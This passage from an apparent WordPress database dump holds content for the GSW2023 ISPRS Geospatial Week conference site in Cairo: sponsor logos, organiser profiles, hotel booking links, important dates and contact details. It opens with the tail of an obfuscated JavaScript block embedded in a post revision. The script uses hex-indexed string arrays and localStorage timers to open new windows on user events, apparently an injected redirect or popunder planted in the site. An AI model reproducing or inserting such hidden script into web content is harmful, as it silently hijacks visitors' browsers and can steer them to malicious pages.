_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 13:35:27','2023-06-09 13:35:27','',3066,'https://gsw2023.com/?p=4639',0,'revision','',0),
(4640,1,'2023-06-09 13:36:10','2023-06-09 13:36:10','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"35\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 